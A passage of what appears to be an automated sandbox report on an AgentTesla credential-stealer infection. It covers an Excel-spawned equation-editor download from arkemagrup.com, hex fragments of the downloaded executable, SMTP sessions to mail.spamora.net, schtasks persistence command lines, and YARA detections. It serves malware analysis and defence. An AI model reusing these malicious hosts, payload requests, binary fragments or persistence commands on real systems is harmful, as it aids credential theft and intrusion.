                                                                                      Jul 22, 2021 18:13:40.309792995 CEST5562753192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:40.369712114 CEST53556278.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:13:40.370260000 CEST5562753192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:40.433701992 CEST53556278.8.8.8192.168.2.22

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Jul 22, 2021 18:12:30.965214014 CEST192.168.2.228.8.8.80xe4c3Standard query (0)arkemagrup.comA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:12:31.023108959 CEST192.168.2.228.8.8.80xe4c3Standard query (0)arkemagrup.comA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:36.833220005 CEST192.168.2.228.8.8.80xca08Standard query (0)mail.spamora.netA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:38.998492956 CEST192.168.2.228.8.8.80x97f4Standard query (0)mail.spamora.netA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:39.065907955 CEST192.168.2.228.8.8.80x97f4Standard query (0)mail.spamora.netA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:40.309792995 CEST192.168.2.228.8.8.80xbefaStandard query (0)mail.spamora.netA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:40.370260000 CEST192.168.2.228.8.8.80xbefaStandard query (0)mail.spamora.netA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Jul 22, 2021 18:12:31.022859097 CEST8.8.8.8192.168.2.220xe4c3No error (0)arkemagrup.com185.26.106.165A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:12:31.081767082 CEST8.8.8.8192.168.2.220xe4c3No error (0)arkemagrup.com185.26.106.165A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:36.891352892 CEST8.8.8.8192.168.2.220xca08No error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:39.056665897 CEST8.8.8.8192.168.2.220x97f4No error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:39.122867107 CEST8.8.8.8192.168.2.220x97f4No error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:40.369712114 CEST8.8.8.8192.168.2.220xbefaNo error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:40.433701992 CEST8.8.8.8192.168.2.220xbefaNo error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • arkemagrup.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249165185.26.106.16580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jul 22, 2021 18:12:31.154568911 CEST0OUTGET /Doc_87654334567.exe HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: arkemagrup.com
                                                                                      Connection: Keep-Alive
                                                                                      Jul 22, 2021 18:12:31.209455013 CEST1INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 22 Jul 2021 16:12:31 GMT
                                                                                      Content-Type: application/x-msdos-program
                                                                                      Content-Length: 479232
                                                                                      Last-Modified: Thu, 22 Jul 2021 13:40:55 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "60f97567-75000"
                                                                                      X-Powered-By: PleskLin
                                                                                      Accept-Ranges: bytes
                                                                                      Jul 22, 2021 18:12:31.209490061 CEST2INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELu`0 5 @ @
                                                                                      Jul 22, 2021 18:12:31.209507942 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jul 22, 2021 18:12:31.209523916 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jul 22, 2021 18:12:31.209538937 CEST6INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: d5HwcpY0rp+*0rp+*"(*j((s(
                                                                                      Jul 22, 2021 18:12:31.209558010 CEST8INData Raw: 72 1f 00 00 70 6f 2c 00 00 0a 00 06 1f 4f 1f 14 73 2d 00 00 0a 6f 2e 00 00 0a 00 06 72 55 00 00 70 6f 2f 00 00 0a 00 02 7b 07 00 00 04 17 6f 1b 00 00 0a 00 02 7b 07 00 00 04 17 6f 30 00 00 0a 00 02 7b 07 00 00 04 72 6b 00 00 70 6f 2c 00 00 0a 00
                                                                                      Data Ascii: rpo,Os-o.rUpo/{o{o0{rkpo,{ s-o.{rpo/{s1o2{rpo,{ s-o.{rpo/{s1o2{rpo,
                                                                                      Jul 22, 2021 18:12:31.209579945 CEST9INData Raw: 2c 00 00 0a 00 02 7b 18 00 00 04 1f 72 1f 16 73 2d 00 00 0a 6f 2e 00 00 0a 00 02 7b 18 00 00 04 72 b3 01 00 70 6f 2f 00 00 0a 00 02 7b 18 00 00 04 02 fe 06 0a 00 00 06 73 31 00 00 0a 6f 32 00 00 0a 00 09 6f 2a 00 00 0a 17 8d 53 00 00 01 25 16 02
                                                                                      Data Ascii: ,{rs-o.{rpo/{s1o2o*S%{o+rpo,;s-o.rpo/{r)po,{ s-o.{rMpo/{s1o2{o3S%%%
                                                                                      Jul 22, 2021 18:12:31.209603071 CEST10INData Raw: 08 00 00 04 6f 3e 00 00 0a 00 02 28 3d 00 00 0a 02 7b 04 00 00 04 6f 3e 00 00 0a 00 02 02 7b 04 00 00 04 28 4c 00 00 0a 00 02 16 28 4d 00 00 0a 00 02 16 28 4e 00 00 0a 00 02 1f 58 19 28 12 00 00 06 28 36 00 00 0a 00 02 16 28 4f 00 00 0a 00 02 72
                                                                                      Data Ascii: o>(={o>{(L(M(NX((6(Orpo9{oP{oQ{oP(P(Q*0OsR_%-oS+(ToU&Xi2oV+*0
                                                                                      Jul 22, 2021 18:12:31.209620953 CEST12INData Raw: 7b 25 00 00 04 0e 04 8c 2c 00 00 01 6f 70 00 00 0a 16 fe 01 13 08 11 08 2c 1c 00 02 7b 25 00 00 04 0e 04 8c 2c 00 00 01 0e 04 73 6c 00 00 0a 6f 71 00 00 0a 00 00 02 7b 25 00 00 04 03 8c 2c 00 00 01 6f 70 00 00 0a 16 fe 01 13 09 11 09 2c 1a 00 02
                                                                                      Data Ascii: {%,op,{%,sloq{%,op,{%,sloq{&,ort0{&,ort0{%,ort1{%,ort1{%,ort19"
                                                                                      Jul 22, 2021 18:12:31.209645987 CEST13INData Raw: 13 0c 12 0d 11 09 11 0a 6b 11 0b 11 0c 28 7c 00 00 0a 00 07 6f 6e 00 00 0a 00 2a 00 13 30 05 00 74 00 00 00 14 00 00 11 00 03 72 e3 05 00 70 6f 7d 00 00 0a 0a 06 2c 09 03 17 6f 7e 00 00 0a 10 01 03 6f 5b 00 00 0a 1c fe 01 16 fe 01 0b 07 2c 0b 72
                                                                                      Data Ascii: k(|on*0trpo},o~o[,rpszo (o (o ((<+*0+*0-%%%%+*0.++
                                                                                      Jul 22, 2021 18:12:31.264138937 CEST15INData Raw: 01 00 0c 00 00 00 1b 00 00 11 00 02 7b 45 00 00 04 0a 2b 00 06 2a 13 30 02 00 46 00 00 00 00 00 00 00 00 02 03 7d 45 00 00 04 02 7b 46 00 00 04 6f 6b 00 00 0a 00 02 03 73 67 00 00 0a 7d 46 00 00 04 02 7b 4e 00 00 04 03 28 97 00 00 0a 6f 7a 00 00
                                                                                      Data Ascii: {E+*0F}E{Foksg}F{N(ozseo(*0{G+*0F}G{Koksg}K{M(ozseo(*0{H+*&}


                                                                                      SMTP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Jul 22, 2021 18:13:37.027579069 CEST58749166185.26.106.194192.168.2.22220-mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:37.028069973 CEST49166587192.168.2.22185.26.106.194EHLO 760639
                                                                                      Jul 22, 2021 18:13:37.085000038 CEST58749166185.26.106.194192.168.2.22220 mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:37.085051060 CEST58749166185.26.106.194192.168.2.22250-mail.spamora.net
                                                                                      250-PIPELINING
                                                                                      250-SIZE 80000000
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 DSN
                                                                                      Jul 22, 2021 18:13:37.086252928 CEST49166587192.168.2.22185.26.106.194STARTTLS
                                                                                      Jul 22, 2021 18:13:37.140757084 CEST58749166185.26.106.194192.168.2.22220 2.0.0 Ready to start TLS
                                                                                      Jul 22, 2021 18:13:37.767450094 CEST58749167185.26.106.194192.168.2.22220-mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:37.767843962 CEST49167587192.168.2.22185.26.106.194EHLO 760639
                                                                                      Jul 22, 2021 18:13:37.824126959 CEST58749167185.26.106.194192.168.2.22220 mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:37.824220896 CEST58749167185.26.106.194192.168.2.22250-mail.spamora.net
                                                                                      250-PIPELINING
                                                                                      250-SIZE 80000000
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 DSN
                                                                                      Jul 22, 2021 18:13:37.824469090 CEST49167587192.168.2.22185.26.106.194STARTTLS
                                                                                      Jul 22, 2021 18:13:37.879425049 CEST58749167185.26.106.194192.168.2.22220 2.0.0 Ready to start TLS
                                                                                      Jul 22, 2021 18:13:39.233465910 CEST58749169185.26.106.194192.168.2.22220-mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:40.547199011 CEST58749170185.26.106.194192.168.2.22220-mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:40.547725916 CEST49170587192.168.2.22185.26.106.194EHLO 760639
                                                                                      Jul 22, 2021 18:13:40.603985071 CEST58749170185.26.106.194192.168.2.22220 mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:40.604139090 CEST58749170185.26.106.194192.168.2.22250-mail.spamora.net
                                                                                      250-PIPELINING
                                                                                      250-SIZE 80000000
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 DSN
                                                                                      Jul 22, 2021 18:13:40.604568005 CEST49170587192.168.2.22185.26.106.194STARTTLS
                                                                                      Jul 22, 2021 18:13:40.659290075 CEST58749170185.26.106.194192.168.2.22220 2.0.0 Ready to start TLS

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:18:11:46
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                      Imagebase:0x13ff10000
                                                                                      File size:27641504 bytes
                                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:18:12:08
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:18:12:10
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                      Imagebase:0x10720000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 13%, ReversingLabs
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:18:12:44
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
                                                                                      Imagebase:0xb70000
                                                                                      File size:179712 bytes
                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:18:12:46
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:{path}
                                                                                      Imagebase:0x10720000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:18:13:14
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
                                                                                      Imagebase:0x10fc0000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 13%, ReversingLabs
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:18:13:22
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
                                                                                      Imagebase:0x10fc0000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:18:13:34
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'
                                                                                      Imagebase:0x280000
                                                                                      File size:179712 bytes
                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:18:13:34
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'
                                                                                      Imagebase:0x280000
                                                                                      File size:179712 bytes
                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:18:13:35
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:{path}
                                                                                      Imagebase:0x10fc0000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, Author: Joe Security

                                                                                      General

                                                                                      Start time:18:13:35
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:{path}
                                                                                      Imagebase:0x10fc0000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, Author: Joe Security

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >

                                                                                        Executed Functions

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: TNBl
                                                                                        • API String ID: 0-2573526999
                                                                                        • Opcode ID: 95cd0073078240b6eda6fb5e5cdb0f2d29cbc24bd7075ebaa72e9e67a39e7841
                                                                                        • Instruction ID: 7b1c1cab9e440e16588470887498555ca7d5637293d8164ee7d5b8fc46e80d95
                                                                                        • Opcode Fuzzy Hash: 95cd0073078240b6eda6fb5e5cdb0f2d29cbc24bd7075ebaa72e9e67a39e7841
                                                                                        • Instruction Fuzzy Hash: 3403C638A00619CFC715EB24C998EE9B7B1FF8A305F1145E9E409AB361DB35AE85CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: n
                                                                                        • API String ID: 0-2795774880
                                                                                        • Opcode ID: 0097b434d60c62f750a17d61e5a31464ae0b5b483950fe94d8eb955c00a4ffff
                                                                                        • Instruction ID: f43240e23c3fb1004e475edacc9497cdca38baad1cfa217d9261c2a84bd44025
                                                                                        • Opcode Fuzzy Hash: 0097b434d60c62f750a17d61e5a31464ae0b5b483950fe94d8eb955c00a4ffff
                                                                                        • Instruction Fuzzy Hash: 30F17D70D05649DFCB09CFB5D4908AEFBB1FF89301B1684A9C412EB665D7389982CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: n
                                                                                        • API String ID: 0-2795774880
                                                                                        • Opcode ID: 30ccdd0f504c2e200ec1bbce27f43f9b4281d490047a2ba0716403dc1a6ca300
                                                                                        • Instruction ID: 1b0cb673a64fd015ffe6f1770d36a6fa9a8bcaf77269d2584dc2bf13255625ee
                                                                                        • Opcode Fuzzy Hash: 30ccdd0f504c2e200ec1bbce27f43f9b4281d490047a2ba0716403dc1a6ca300
                                                                                        • Instruction Fuzzy Hash: 3DD14970D0560ADFCB08CFA5D4808EEFBB6FF88302B61C559D416AB619D7349982CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .4,
                                                                                        • API String ID: 0-663042416
                                                                                        • Opcode ID: 7a9cf98ff737993e5e8f1fdc29c9ddab1dcdbd09f19fa7e7170c7a8cb86ca51c
                                                                                        • Instruction ID: 1ce91edc720c12507c4e2169b827d331dbadafd17d47997736242414e763f029
                                                                                        • Opcode Fuzzy Hash: 7a9cf98ff737993e5e8f1fdc29c9ddab1dcdbd09f19fa7e7170c7a8cb86ca51c
                                                                                        • Instruction Fuzzy Hash: 20910274E002089FCB09CFE5D8445EEBBB6FF89304F20952AE516AB769DB345902CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .4,
                                                                                        • API String ID: 0-663042416
                                                                                        • Opcode ID: 886b6d9102ec3e27d04eaa4c40ffbb09ba6f9b457454b94ca55ace8323ae10ff
                                                                                        • Instruction ID: 3033c8a5a595748946f14d43ada61f93a7fae5396c352b5fdccd762f5b849527
                                                                                        • Opcode Fuzzy Hash: 886b6d9102ec3e27d04eaa4c40ffbb09ba6f9b457454b94ca55ace8323ae10ff
                                                                                        • Instruction Fuzzy Hash: 2C810274E002189FCB08CFE5D8845EEBBB6FF89304F209529E516AB769DB345902CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f31f6dcedde75a472e982d288db833c1939c18a90025011b44af238719a1d3ff
                                                                                        • Instruction ID: aa866e2be66e21df85abd18feb2c94059287e11fd91ed4957b163858eccab142
                                                                                        • Opcode Fuzzy Hash: f31f6dcedde75a472e982d288db833c1939c18a90025011b44af238719a1d3ff
                                                                                        • Instruction Fuzzy Hash: EFB102B5D05259CFDB09CFB9C8546DEFBB2EF8A300F24806AD406AB265DB355842CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d761e01e1cf6b754158b2c498dc976873256baea46a931bf6bd52bbf81f042bb
                                                                                        • Instruction ID: 8e6c25b13dee0576919bfb89f5e3a0451902358af845f0c59293548936c51a62
                                                                                        • Opcode Fuzzy Hash: d761e01e1cf6b754158b2c498dc976873256baea46a931bf6bd52bbf81f042bb
                                                                                        • Instruction Fuzzy Hash: 8281A3B4E012198FDB08CFA9C984ADEFBB2EF88300F24942AD515BB364DB355945CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: eafc13057d10ec7c7f43a388fc28f791737088f2eb6de1351e6e5deafd2d3ae8
